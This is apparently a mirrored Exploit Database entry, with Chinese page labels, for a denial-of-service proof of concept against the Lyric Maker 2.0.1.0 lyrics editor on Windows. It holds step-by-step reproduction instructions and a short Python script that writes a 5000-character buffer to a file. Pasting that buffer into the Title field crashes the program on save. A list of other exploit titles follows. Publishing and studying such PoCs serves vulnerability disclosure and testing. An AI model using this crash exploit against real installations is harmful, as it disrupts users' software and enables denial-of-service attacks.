Lyric Maker 2.0.1.0 – Denial of Service (PoC)

Exploit Database
15 阅读

作者： Alejandra Sánchez

日期： 2019-05-09
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46817/

# -*- coding: utf-8 -*-
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 2.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
# 3.- Open JetLyric.exe or Lyric Maker
# 4.- Paste clipboard in in the field "Title"
# 5.- Go to file -> Save Lyric...
# 6.- Save the file with any name, e.g 'sample.jlr'
# 7.- Crashed

buffer = "\x41" * 5000
f = open ("LyricMaker.txt", "w")
f.write(buffer)
f.close()

last Exploits
Lyric Maker 2.0.1.0 – Denial of Service (PoC)的更多信息

PLC Wireless Router GPN2.4P21-C-CN – Denial of Service：
Moxa MXview 2.8 – Denial of Service：
QNAP NetBak Replicator 4.5.6.0607 – Denial of Service (PoC)：
Apple Quick Time Player (Windows) 7.7.3 – Out of Bound Read：
Lua 5.3.5 – ‘debug.upvaluejoin’ Use After Free：
Adobe Flash – MovieClip.duplicateMovieClip Use-After-Free：
VideoLAN VLC Media Player 1.1.11 – ‘.amr’ Denial of Service (PoC)：
IrfanView 4.27 – ‘JP2000.dll’ plugin Denial of Service：